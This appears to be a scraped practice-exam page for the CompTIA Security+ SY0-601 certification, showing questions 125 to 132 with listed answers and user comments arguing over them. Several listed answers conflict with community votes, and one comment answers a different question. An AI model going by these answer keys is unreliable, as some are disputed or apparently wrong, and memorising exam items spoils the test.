Selected Answer: C
They are hardening their systems against future attack vectors. That is a preventive measure
upvoted 3 times

  jhfdkjshfkjdsho 1 month, 2 weeks ago


Selected Answer: C
Preventive. There is no attack.
upvoted 2 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: D
The organization has implemented a detective control. A detective control is a security control that is used to detect security incidents or policy
violations after they have occurred. In this case, the organization has implemented a process that compares the settings currently configured on
systems against secure configuration guidelines in order to identify any gaps. This is an example of a detective control, as it is designed to detect
any deviations from the organization's secure configuration standards. Detective controls are typically used in conjunction with other types of
controls, such as preventive controls, which are designed to prevent incidents from occurring, and corrective controls, which are used to correct
any issues that are detected. Compensating controls are used to address risks that cannot be mitigated by other means.
upvoted 3 times

  Lv2023 1 month, 4 weeks ago


Selected Answer: C
Given the scenario and the following definitions
Preventive: the control acts to eliminate or reduce the likelihood that an attack can succeed. A preventative control operates before an attack can
take place.
Detective: the control may not prevent or deter access, but it will identify and record any attempted or successful intrusion. A detective control
operates during the progress of an attack.

Based on the definition of these two controls the question in my opinion is describing a preventive control. They are hoping to prevent an "event"
by comparing the current configuration to the so-called best practices/recommended configurations, if the exercise identifies any weak
configurations, I imagine updates will be made.
upvoted 3 times

  afazaeli 2 months ago


D is wrong, detective detects attacks not vulnerabilities. C is the correct answer which is "Preventive"
upvoted 2 times

  tek7ila 2 months ago


Selected Answer: C
It's C. It's preety simple question if you understand about what every method is :

Corrective - used after incident tu remove vulnerability

Detective - to detect any incident that is happening

Compensanting - used when you knopw there is vulnerability but u cannot remove it from system (for example. some old stations that are
essentail for ytour work but are no longer supported by Microsoft)

Ant last but not lease PREVENTIVE which is nothing else as HARDENING :)
upvoted 1 times

  Kalender 2 months, 1 week ago


Selected Answer: C
...guidelines in order to identify any gaps...

Why are we trying to to identify any gaps?


so that the event doesn't happen...so the event hasn't happened yet. so it's preventive control
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 210/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  bengy78 2 months, 3 weeks ago


Its preventative not detective, straight from Comptia Certmaster "A detective control operates during the progress of an attack."
upvoted 1 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: D
This is a detective control, as soon as you start to apply the findings from this comparison, this system hardening would be a preventive control
upvoted 5 times

  The_F00L 3 months ago


Selected Answer: D
Remember. It's CompTIA.
"in order to IDENTIFY any gaps"
There is no "action" implied in the question. It's D. Detective
upvoted 5 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 211/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #125 Topic 1

The Chief Information Security Officer directed a risk reduction in shadow IT and created a policy requiring all unsanctioned high-risk SaaS
applications to be blocked from user access. Which of the following is the BEST security solution to reduce this risk?

A. CASB

B. VPN concentrator

C. MFA

D. VPC endpoint

Correct Answer: A

Community vote distribution


A (100%)

  Mamun1 Highly Voted  5 months ago


Selected Answer: A
A cloud access security broker (CASB) is on-premises or cloud-based software that sits between a cloud service consumer and a cloud service
provider. It serves as a tool for enforcing an organization's security policies through risk identification and regulation compliance whenever its
cloud-residing data is accessed.
upvoted 13 times

  ScottT 4 months, 3 weeks ago


For me the key clue is SaaS suggesting cloud computing. With that being decided CASB is the only option
upvoted 5 times

  comeragh Highly Voted  5 months ago


Selected Answer: A
By process of elimination A seems to be the correct answer
upvoted 5 times

  Gino_Slim 3 months, 1 week ago


That's exactly what I did. Even if I didn't know what CASB meant, the others didn't make any sense
upvoted 4 times

  DALLASCOWBOYS Most Recent  4 days, 11 hours ago


A. SaaS is a cloud based service, therefore, a CASB, Cloud Access Security Broker
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: A
The best security solution to reduce the risk of shadow IT and unsanctioned high-risk SaaS applications is a Cloud Access Security Broker
(CASB). A CASB is a security solution that is designed to provide visibility and control over cloud applications and services. It can be used to
block access to unsanctioned applications and to enforce security policies and compliance requirements for cloud services. In this case, the
CASB would be used to block access to unsanctioned high-risk SaaS applications, reducing the risk of shadow IT and helping the organization
to maintain control over its cloud environment. Options B, C, and D are not specifically related to reducing the risk of shadow IT and
unsanctioned SaaS applications. A VPN concentrator is a network device that is used to manage and terminate VPN connections, MFA is a
security control that requires multiple factors for authentication, and a VPC endpoint is a networking feature that allows private access to AWS
services.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 212/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #126 Topic 1

A technician enables full disk encryption on a laptop that will be taken on a business trip. Which of the following does this process BEST protect?

A. Data in transit

B. Data in processing

C. Data at rest

D. Data tokenization

Correct Answer: C

Community vote distribution


C (100%)

  DALLASCOWBOYS 4 days, 11 hours ago


C. Data at rest, such as when data stored on the device when it is in an off state, or when a laptop is in sleep mode.
upvoted 1 times

  xxxdolorxxx 2 weeks, 1 day ago


C is the right answer. They tried to throw a curveball with the "traveling" thing, lol.
upvoted 2 times

  kstevens11 2 months, 4 weeks ago


Selected Answer: C
Full DISK encryption - disk data is data at rest
upvoted 3 times

  Gravoc 4 months, 2 weeks ago


Data in transit is incorrect. The official terminology is data in motion.

Data-in-Motion: Data that is in transit over a network. Think data packets working their way across the internet.

Data-at-Rest: Stored data that resides on hard drives, tapes, in the cloud, or on other storage media. When this is taught, it's almost always
taught as a USB stick laying on a desk in an office. Don't forget that this is broad category.

Data-in-Processing: Data that is actively in use by a computer system. Includes data stored in memory while processing takes place.
upvoted 4 times

  serginljr 4 months, 3 weeks ago


Selected Answer: C
Data at Rest is correct Answer.

Data at rest: Data at rest is data in its stored or resting state, which is
typically on some type of persistent storage such as a hard drive or tape.
Symmetric encryption is used in this case.
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 213/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #127 Topic 1

A security analyst was called to investigate a file received directly from a hardware manufacturer. The analyst is trying to determine whether the
file was modified in transit before installation on the user's computer. Which of the following can be used to safely assess the file?

A. Check the hash of the installation file.

B. Match the file names.

C. Verify the URL download location.

D. Verify the code signing certificate.

Correct Answer: A

Community vote distribution


A (72%) D (28%)

  Gravoc Highly Voted  4 months, 2 weeks ago


The hardware manufacturer will post the hash of the file publicly, and anyone who receives a copy of that file will be able to run a checksum on
the file themselves, and compare them to the official manufacturer-provided checksum. Hashing is almost always the correct answer in these
type of questions. You'll see a lot of Github repositories using hashed checksums as well for verification, and I recently just installed Java onto
my new computer. Java provided me with a hashed checksum for the setup executable.
upvoted 11 times

  DALLASCOWBOYS Most Recent  4 days, 11 hours ago


A. Check the hash of the file to verifiy the integrity of the file to see if it was modified.
upvoted 1 times

  Blake89 1 week, 4 days ago


Selected Answer: A
Directly from the CompTIA Sec + Study Guide: "• The most common way to validate that a forensic copy matched an original copy is to create a
hash of the copy and to create a hash of the original drive, and then compare them. If the hashes match, the forensic copy is identical to the
original."
upvoted 2 times

  sanlibo 2 weeks, 1 day ago


Selected Answer: A
Hashing
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: A
The security analyst can safely assess the file by checking the hash of the installation file. A hash is a unique value that is generated based on the
contents of a file. When a file is sent from one party to another, the sender can compute the hash of the file and provide it to the recipient. The
recipient can then compute the hash of the received file and compare it to the original hash. If the hashes match, it indicates that the file has not
been modified and is identical to the original file. This can provide assurance that the file has not been tampered with or corrupted in transit.
Options B, C, and D are not reliable methods for determining whether a file has been modified in transit. Matching file names does not guarantee
the integrity of the file, verifying the URL download location does not provide information about the file itself, and verifying the code signing
certificate does not guarantee that the file has not been modified.
upvoted 1 times

  tek7ila 2 months ago


Selected Answer: A
A. Always when it's about checking if app wasnt't modified by 3rd party - you compare hashes :p
upvoted 2 times

  kstevens11 2 months, 4 weeks ago


Selected Answer: A
keywords: "determine whether a file was modified", and you need a hash comparison for this. Code signing is more for nonrepudiation, I thought.
upvoted 2 times

  MathDayMan 3 months, 1 week ago


A
Hashed is the right one
upvoted 1 times

  G4ct756 3 months, 2 weeks ago


Selected Answer: D

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 214/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

D. There are possibility of hash collision, and we can't verify if file is from manufacturer.
Code sign certificate, verify file is not tampered together with Signer's identity.
I would think code sign certificate will hold more weight over file hash.
upvoted 3 times
  Tomtom11 3 months, 3 weeks ago
Selected Answer: A
File is Hashed
Code is Signed to ensure it has not be altered
upvoted 2 times

  abrilo 3 months, 3 weeks ago


Another use of digital certificates, is often used when we are distributing software. A developer will create an executable or a piece of software
that needs to be distributed, and then they will sign that software with a code signing certificate. This means that we can receive that software
and install it and during the installation process, we can validate that the program that we’re installing is exactly the same executable as the one
that was distributed by the manufacturer.
upvoted 1 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: A
I can see why D could work but I'm still going with A, since A is almost always the answer to these sort of questions and it is what I always hear,
check the hash/checksum
upvoted 3 times

  gennyyy 4 months, 2 weeks ago


Selected Answer: D
Should be D
upvoted 2 times

  andrizo 3 months, 3 weeks ago


certs are more for non-repudiation though
upvoted 2 times

  kstevens11 2 months, 4 weeks ago


agreed
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 215/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #128 Topic 1

A help desk technician receives a phone call from someone claiming to be a part of the organization's cybersecurity incident response team. The
caller asks the technician to verify the network's internal firewall IP Address. Which of the following is the technician's BEST course of action?

A. Direct the caller to stop by the help desk in person and hang up declining any further requests from the caller.

B. Ask for the caller's name, verify the person's identity in the email directory, and provide the requested information over the phone.

C. Write down the phone number of the caller if possible, the name of the person requesting the information, hang up, and notify the
organization's cybersecurity officer.

D. Request the caller send an email for identity verification and provide the requested information via email to the caller.

Correct Answer: D

Community vote distribution


C (71%) D (29%)

  stoneface Highly Voted  5 months ago


Selected Answer: D
D->Request the caller send an email for identity verification and provide the requested information via email to the caller. -> This will allow to have
a record of the requested information as well as identifying the requester.
upvoted 9 times

  J_Ark1 2 months, 4 weeks ago


For the SIEM systems to be able to know who it was that attacked and compromised the system?
upvoted 1 times

  J_Ark1 2 months, 4 weeks ago


The issue is that a random individual is trying to gain acess to the internal network and hence we do not know their intended purpose, so it
makes sense to notify the cyber security officer so that they can confirm their authorisation via the right channels of communication.
upvoted 2 times

  varun0 5 months ago


Emails can easily be spoofed, C seems to be the best option.
upvoted 6 times

  VendorPTS 4 months ago


Also, as it didn't say the email was encrypted, the email is potentially subject to monitoring/analysis, and you don't really want to put that
out there without securing it. C seems best with these choices.
upvoted 3 times

  rodwave Highly Voted  2 months, 3 weeks ago


Selected Answer: C
Answer: Write down the phone number of the caller if possible, the name of the person requesting the information, hang up, and notify the
organization's cybersecurity officer.

In this scenario, the help desk technician should be wary of the person's request as help desk technicians would not have this information. Also,
if the person claimed to be from the cybersecurity incident response team, they would more likely to have access to this information anyway, or
at least know who to contact.

For the sake of the technician, it would be best to get as much information as possible and delegate the task of confirming the person's identity
to the cybersecurity officer. Even in the very slim chance that it was a legitimate request, it would still be best for the cyber security officer to
provide this information instead of a tech.
upvoted 5 times

  xxxdolorxxx 2 days, 16 hours ago


Most Recent 
So I read this a few times and maybe it's just me but the second half of D is throwing some red flags for me. "and provide the requested
information via email to the caller." this implies that the company would then send the documents to the caller. Wouldn't that be a potential
security risk? Originally I thought D. Now I feel like D is wrong.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: D
A benefit of including a risk management framework into an organization's security approach is that it incorporates control, development, policy,
and management activities into IT operations. A risk management framework is a structured approach to identifying, assessing, and mitigating
risks to the organization's assets, operations, and reputation. By incorporating a risk management framework into the organization's security
approach, the organization can ensure that control, development, policy, and management activities are integrated into its IT operations, and that
appropriate measures are taken to address potential risks. This can help to improve the overall security posture of the organization and to reduce
the likelihood and impact of security incidents. Options A, B, and C are not benefits of incorporating a risk management framework into an

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 216/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

organization's security approach. A risk management framework does not necessarily define expected service levels from supply chain partners,
identify specific vendor products, or provide legal assurances and remedies in the event of a data breach.
upvoted 1 times
  FMMIR 1 month, 3 weeks ago
Selected Answer: D
I am with Stoneface.

The technician's best course of action is to request the caller send an email for identity verification and provide the requested information via
email to the caller. In this situation, it is important for the technician to verify the identity of the caller before providing any sensitive information.
The caller could be a malicious actor attempting to gain unauthorized access to the organization's network, and providing the requested
information over the phone could be a security risk. By requesting that the caller send an email for identity verification, the technician can ensure
that the person on the other end of the line is who they claim to be, and that the request is legitimate. The technician can then provide the
requested information via email, which is a more secure method of communication than over the phone. Options A, B, and C are not appropriate
in this situation, as they do not provide adequate safeguards for verifying the identity of the caller.
upvoted 1 times

  deeden 2 months ago


Selected Answer: C
This one is tricky. Not sure why would a CSIRT member be asking Helpdesk for the Firewall IP instead of the Network Administrator. Maybe C
would be a better choice given the scenario? I'm sure the Helpdesk will call CSIRT back if found legitimate :)
upvoted 2 times

  deeden 2 months ago


Call back using work number found on the corporate directory, that sound safer to me. Backed up by email request and a relevant incident
ticket number, just to me sure.
upvoted 1 times

  redx04 2 months, 1 week ago


C makes more sense at work .
upvoted 1 times

  J_Ark1 2 months, 4 weeks ago


Selected Answer: C
It is C because its simply a random individual seeking to try and bypass other security requirments so it makes sense to delegate the issue to the
cyber security officer so as to confirm that they are authorised to attain the information and prevent any malicous actor from gaining access to
the internal network. Its not D as the question does not contain enough info as to support D as the answer (forgive my spelling: ive got dyslexia)
upvoted 4 times

  lordguck 3 months, 1 week ago


A and keep a baseball bat handy ;-)
upvoted 4 times

  Libraboy 3 months, 2 weeks ago


why not A?
upvoted 3 times

  Strykar 4 months, 1 week ago


Selected Answer: C
Not D - The helpdesk tech is not supposed to provide this information. Also the email can be spoofed.
upvoted 5 times

  Jakalan7 4 months, 2 weeks ago


Another subjective question, the answer could easily be C or D.
upvoted 1 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: C
It is C, D is in no way safe and cannot be considered proof
upvoted 3 times

  Gravoc 4 months, 2 weeks ago


It's C. Helpdesk isn't authorized to do basically anything. Helpdesk should be seen as basic troubleshooting, and then escalating to the
appropriate party when it goes beyond that. If Helpdesk can't find the answer on google, then it's time to escalate. Can helpdesk find the
companies internal firewall IP on google? No? Then escalate.
upvoted 4 times

  Gino_Slim 3 months, 1 week ago


All this should let everyone know....do NOT get trapped in Helpdesk. You will get nowhere in life.
upvoted 5 times

  Yuyuyakuza 4 months, 3 weeks ago


C. considering a helpdesk technician doesnt have the ability/authority to passout internal IPs, you should escalte that to tier 2 networking.. best
answer just take the info play it safe and the information on to the
Cyber security team.

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 217/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 1 times
  comeragh 4 months, 4 weeks ago
On further review I think C sits best as the answer here
upvoted 2 times

  Liftedkris 5 months ago


Selected Answer: C
I would go with C here. D was the other option I considered carefully, however even emails are not completely safe as they could be spoofed
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 218/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #129 Topic 1

Which of the following would BEST provide detective and corrective controls for thermal regulation?

A. A smoke detector

B. A fire alarm

C. An HVAC system

D. A fire suppression system

E. Guards

Correct Answer: D

Community vote distribution


C (78%) D (22%)

  stoneface Highly Voted  5 months, 1 week ago


Selected Answer: C
What are the functions of an HVAC system?

An HVAC system is designed to control the environment in which it works. It achieves this by controlling the temperature (THERMAL) of a room
through heating and cooling. It also controls the humidity level in that environment by controlling the movement and distribution of air inside the
room. So it provides detective and corrective controls for THERMAL regulation.
upvoted 17 times

  Blake89 Most Recent  1 week, 4 days ago


Selected Answer: C
CompTia Study Guide book: 'HVAC systems ensures that the processes or systems are at the proper temperature and humidity."
upvoted 1 times

  Boubou480 4 weeks ago


Selected Answer: C
C. An HVAC system would provide the best detective and corrective controls for thermal regulation. An HVAC (heating, ventilation, and air
conditioning) system can detect deviations in temperature and adjust accordingly to maintain a comfortable and safe range. It can also alert
maintenance staff if there is a problem that needs to be corrected.
upvoted 1 times

  jhfdkjshfkjdsho 1 month, 2 weeks ago


Selected Answer: D
A fire suppression system, like a fire sprinkler system, is used to extinguish or control fires, and is activated by heat, smoke, or a combination of
the two. However, a fire suppression system uses gaseous, chemical, or foam fire suppression agents to suppress the fire, rather than water. So,
it is a detective and corrective system
upvoted 1 times

  Blake89 1 week, 4 days ago


Lol just stop it. The answer is C
upvoted 1 times

  PraygeForPass 3 weeks, 1 day ago


Thermal regulation isn't just fires/smoke. It can be extremely cold or humid in a building for example. A fire suppression system won't help
with that.
upvoted 2 times

  nul8212 1 month, 2 weeks ago


Selected Answer: D
This answer covers both parts of the question.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: C
An HVAC system would provide the best detective and corrective controls for thermal regulation. An HVAC (heating, ventilation, and air
conditioning) system is a type of building management system that is used to control the temperature, humidity, and air quality within a building.
HVAC systems typically include sensors that can detect changes in temperature, and control mechanisms that can adjust the heating or cooling
output to maintain a comfortable and safe environment. This provides both detective and corrective controls for thermal regulation, as the
sensors can detect deviations from the desired temperature range, and the control mechanisms can automatically adjust the heating or cooling
output to correct the problem. Options A, B, D, and E do not provide the same level of control for thermal regulation as an HVAC system. A
smoke detector and fire alarm can detect fires, but they do not provide the same level of control over the temperature within a building. A fire

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 219/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

suppression system can extinguish fires, but it does not provide any control over the temperature. Guards do not provide any control over the
temperature
upvoted 1 times
  babyzilla 2 months, 3 weeks ago
Selected Answer: C
Remember corrective and detective are AFTER an incident occurs. The first suppression system would kick in after a fire happened...I highly
doubt that this is what the question is referring to. On the other hand, in order for a HVAC system to activate, a simple thermal change has to
happen. Just like at home, you set your thermostat to heat or cool and set a temp. If it goes below or above your set temp, then the system will
kick on.
upvoted 1 times

  The_F00L 3 months ago


its HVAC, but man... gotta love Fire supression as an answer. got a giggle out of me
upvoted 1 times

  Oval61251 3 months, 1 week ago


Where do the "correct" answers come from? I believe the answer is C but apparently the "correct" one is D? Which one is correct based off
CompTIA?
upvoted 1 times

  sm0k3 3 months, 2 weeks ago


Keyword… REGULATE.: control or maintain the rate or speed of (a machine or process) so that it operates properly. Answer is HVAC.
upvoted 1 times

  andrizo 3 months, 3 weeks ago


Just kinda throwing it out there, isn't a HVAC system more preventive than corrective?
upvoted 2 times

  ergo54 3 months, 4 weeks ago


Selected Answer: D
Once again, going back to the Daril Gibson study guide here. No where in the study guide is HVAC discussed (that I can find), but fire
suppression system is:
"A fixed [fire suppression] system can detect a fire and automatically activate it to extinguish the fire."
upvoted 4 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: C
Should be C
upvoted 2 times

  Gravoc 4 months, 2 weeks ago


HVAC all the way.
upvoted 1 times

  Fitzd 4 months, 2 weeks ago


it has to be Hvac, fire suppression system has built-in components that detect fires at the beginning stages through heat, smoke, and other
warning signals.
upvoted 1 times

  k9_462 4 months, 3 weeks ago


Selected Answer: C
thermal regulation. AKA a thermostat. Its HVAC
upvoted 1 times

  ksave 4 months, 3 weeks ago


Selected Answer: C
Detects the fire and recovers it from fire.
I am going with answer C.
upvoted 1 times

  ksave 4 months, 3 weeks ago


I meant answer D :)
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 220/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #130 Topic 1

Which of the following is a benefit of including a risk management framework into an organization's security approach?

A. It defines expected service levels from participating supply chain partners to ensure system outages are remediated in a timely manner.

B. It identifies specific vendor products that have been tested and approved for use in a secure environment.

C. It provides legal assurances and remedies in the event a data breach occurs.

D. It incorporates control, development, policy, and management activities into IT operations.

Correct Answer: D

Community vote distribution


D (78%) C (22%)

  tek7ila 1 month, 4 weeks ago


Selected Answer: D
I would go with D. There is nothing about legal assurence in books i read.

Risk management is about identyfying vulnerabilities and threats in your company. To help you mitigater them, so your company can run
smoothly.
upvoted 2 times

  deeden 2 months ago


Selected Answer: C
Agree with C. RMF goes beyond IT Operations and Supplier/Vendor management.
upvoted 1 times

  passmemo 3 months, 3 weeks ago


Selected Answer: D
An effective risk management framework will prioritize understanding the risks that your business faces to take the necessary steps to protect
your assets and your business
upvoted 2 times

  skorza 4 months ago


Is it not A as the benefit is "to ensure system outages are remediated in a timely manner"?
upvoted 2 times

  studant_devsecops 4 months, 1 week ago


Selected Answer: C
Believe the keyword is reference to legal. Does anyone think same?
upvoted 1 times

  [Removed] 4 months, 1 week ago


Where is it referencing "legal"?
upvoted 2 times

  Gino_Slim 3 months, 1 week ago


It doesn't. Idk where they got that from.
upvoted 2 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: D
I agree with D
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 221/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #131 Topic 1

An organization maintains several environments in which patches are developed and tested before being deployed to an operational status. Which
of the following is the environment in which patches will be deployed just prior to being put into an operational status?

A. Development

B. Test

C. Production

D. Staging

Correct Answer: B

Community vote distribution


D (95%) 5%

  KetReeb Highly Voted  5 months ago


Answer D: The staging environment is an optional environment, but it is commonly used when an organization has multiple production
environments. After passing testing, the system moves into staging, from where it can be deployed to the different production systems.
upvoted 9 times

  Samsonite363 Most Recent  3 days, 15 hours ago


Selected Answer: D
Development > Testing > Staging > Production
upvoted 1 times

  Comicbookman 2 weeks ago


A staging environment is the last step before something goes into production and is visible on the live site.

A staging site’s main purpose is to ensure that all new changes deployed from previous environments are working as intended before they hit the
live website. By using a staging site and testing everything before deploying to a live website, you will be able to eliminate bugs and issues, so
they never affect the user. Sometimes this process is referred to as quality assessment (QA).
upvoted 1 times

  Boubou480 4 weeks ago


Selected Answer: D
D. Staging

The staging environment is where patches are deployed just prior to being put into an operational status. It is a test environment that closely
resembles the production environment, and it is used to ensure that patches are working correctly before they are deployed to the production
environment.

The development environment is where new patches are developed and tested before they are ready to be deployed to a test environment. The
test environment is where patches are tested to ensure that they are working correctly before they are deployed to the staging environment. The
production environment is the live operational environment where patches are deployed once they have been tested and approved.
upvoted 1 times

  Capt_Mundo 1 month, 1 week ago


Selected Answer: C
I think its C as it stated in the question "Which of the following is the environment in which patches will be deployed", the patches are being
deployed during TESTING however, in STAGING patches are already been deployed and tested, its for observation whether for deployment to
Production is feasible.
upvoted 1 times

  Capt_Mundo 1 month, 1 week ago


I stand corrected B is my answer due to the reasons above. thanks
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: D
Answer: Staging

Staging is an testing environment similar to production where software system will go through final testing to ensure the application will work
properly when it's deployed to production
====================
Software Development Environment Stages:
1. Development - Where the actual development of the software takes place (source code/machine code)
2. Testing - The testing environment is where new or updated code functionalities from development is tested. The primary focus is components
of the software vs the entire application.
3. Staging - After passing tests, the software system moves to the staging environment which is identical to production where the system will go
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 222/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

through final testing to ensure the application will work properly when it's deployed to production
4. Production - This is the live environment that is available to users
upvoted 3 times
  RonWonkers 4 months, 2 weeks ago
Selected Answer: D
It's D, kind of weird to give away 3 out of 4 steps in the question itself, leaving Stage as the only option :P.
upvoted 2 times

  Liftedkris 4 months, 4 weeks ago


Selected Answer: D
For sure!
upvoted 4 times

  comeragh 5 months ago


Selected Answer: D
D - staging. I agree with operation status referring to production.
development/testing/staging/production (in this order)
upvoted 4 times

  kingsAffection 5 months ago


Selected Answer: D
D is the answer, key phrase - "prior to being put into an operational status?", operational status or "production" and it will always be the staging
before production.
upvoted 3 times

  DUCKDOG 5 months ago


Selected Answer: D
Should be D.
upvoted 2 times

  stoneface 5 months, 1 week ago


Not sure about this one.

A development environment does match with the description that patches are developed and tested, and that is usually on a local machine aka
ad a dev environment.

In a test environment code from multiple developers is merged to a single master copy and subjected to basic unit and functional tests (either
automated or by human testers) and to integration and regression tests.

Can we consider that development env being is in an operational status since usually developers will have a local copy?
upvoted 2 times

  Sandon 2 months, 2 weeks ago


I expected better from you Stoneface.
upvoted 1 times

  Bimtos 2 weeks, 5 days ago


oh mine! He isn't perfect, you can't expect him to always get it right.
Everyone has got areas of strengths and weaknesses. This isn't his strength this time.
upvoted 1 times

  Gravoc 4 months, 2 weeks ago


Ignore the first sentence of the question. Only read the second sentence. It's asking which phase comes just BEFORE production. Staging is
the correct answer.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 223/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #132 Topic 1

During a trial, a judge determined evidence gathered from a hard drive was not admissible. Which of the following BEST explains this reasoning?

A. The forensic investigator forgot to run a checksum on the disk image after creation.

B. The chain of custody form did not note time zone offsets between transportation regions.

C. The computer was turned off, and a RAM image could not be taken at the same time.

D. The hard drive was not properly kept in an antistatic bag when it was moved.

Correct Answer: B

Community vote distribution


B (60%) A (40%)

  Dachosenone Highly Voted  5 months ago


Selected Answer: B
The question states that a trial Judge determined evidence gathered from a hard drive was not admissible. It is obvious that this is a legal matter.
All of the remaining answers are of a technical nature, So consequently the only issue that a Judge can rule on is a Chain of custody issue. So,
ladies and gentlemen, I rest my case (quickly bangs a gavel upon the desk)
upvoted 13 times

  kstevens11 2 months, 4 weeks ago


great point with 3 of the answers being technical in nature
upvoted 1 times

  enginne 4 months, 4 weeks ago


"time zone offsets between transportation regions" - between transportation evicende not while gathering
upvoted 1 times

  Ay_ma Highly Voted  4 months, 3 weeks ago


Selected Answer: B
If you read through the forensics chapter in Darril Gibson's (Ebook PG. 779) sce+ guide, Option B will make sense to you.
Chain of Custody is one of the important parts of forensics, cause someone has to take responsibility for protecting the evidence. Your evidence
also always has to show exact dates. And in this question, the evidence needed to be transported to multiple geographical locations before it got
to the judge. So if there's a mismanagement of dates and times, it won't be legally admissible in court, cause 2 rules have been violated.
upvoted 11 times

  Blake89 Most Recent  1 week, 4 days ago


Selected Answer: B
"Regardless of the type of forensic data that is obtained or handled, it is important to maintain chain of custody if the forensic case may result in
a legal case." - CompTIA Study Guide book
upvoted 1 times

  Boubou480 4 weeks ago


Selected Answer: A
A. The forensic investigator forgot to run a checksum on the disk image after creation.

A checksum is a numerical value that is calculated based on the contents of a file. It is used to verify the integrity of the file. If a checksum is not
run on the disk image after it is created, there is no way to verify that the contents of the disk image are an exact copy of the original hard drive.
Without this verification, the judge may determine that the evidence gathered from the hard drive is not admissible.

Option B is not a valid reason for the judge's decision because the chain of custody form is used to document the handling and movement of
evidence, not to verify the integrity of the evidence. Option C is not a valid reason because taking a RAM image is not necessary for the
admissibility of evidence from a hard drive. Option D is not a valid reason because the way in which the hard drive was transported does not
affect the integrity of the evidence on the drive.
upvoted 4 times

  alwaysrollin247 1 month, 2 weeks ago


Selected Answer: B
If the time zone of the suspect computer is not identified prior to extracting and viewing any Internet history or cache data then the date/time
stamps may not be accurately represented! You MUST establish the correct settings prior to importing any data.

https://kb.digital-detective.net/display/BF/Identification+of+Time+Zone+Settings+on+Suspect+Computer
upvoted 1 times

  bhigh14 1 month, 3 weeks ago


Selected Answer: B

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 224/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

From the Phoenix TS Student Manual:


"Forensics is the science of collecting evidence that's admissible in court. Admissible forensic evidence needs to be relevant to a legal case,
sufficient in detail to prove a claim, and have a documented chain of custody proving that it was collected legitimately and hasn't been altered
since."
Based on that, I'll go with B.
upvoted 1 times
  Jimbobilly 1 month, 3 weeks ago
Selected Answer: A
If the forensic investigator forgot to run a checksum on the disk image after creation, it could indicate that the integrity of the image is uncertain.
This could lead the judge to conclude that the evidence gathered from the hard drive is not admissible, because it cannot be verified that the
evidence has not been tampered with or altered in any way.
upvoted 2 times

  afazaeli 1 month, 3 weeks ago


A. Checksum makes sure of integrity
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: B
A judge determined that evidence gathered from a hard drive was not admissible because the chain of custody form did not note time zone
offsets between transportation regions. In a criminal investigation, the chain of custody refers to the documentation that records the movement
and handling of physical evidence, such as a hard drive, from the time it is seized to the time it is presented in court. The chain of custody must
be properly documented and maintained in order for the evidence to be considered admissible in court. If the chain of custody is not properly
documented, it can be argued that the evidence may have been tampered with or that its integrity has been compromised. In this case, the judge
determined that the chain of custody form did not adequately record the time zone offsets between transportation regions, and therefore the
evidence from the hard drive was not admissible. Options A, C, and D are not accurate explanations for why the evidence from the hard drive
was not admissible. Running a checksum on the disk image, taking a RAM image, and properly storing the hard drive in an antistatic bag are all
important steps in the forensic process, but they are not directly related to the admissibility of evidence in court
upvoted 1 times

  Sanjucbsa 1 month, 4 weeks ago


Selected Answer: A
Perform a hash test analysis to further authenticate the working clone. Performing a hash test ensures that the data we obtain from the previous
bit-by-bit copy procedure is not corrupt and reflects the true nature of the original evidence. If this is not the case, then the forensic analysis may
be flawed and may result in problems, thus rendering the copy non-authentic.
upvoted 1 times

  Kalender 2 months, 1 week ago


Selected Answer: B
"Courts will rule the evidence inadmissible if there is a lack
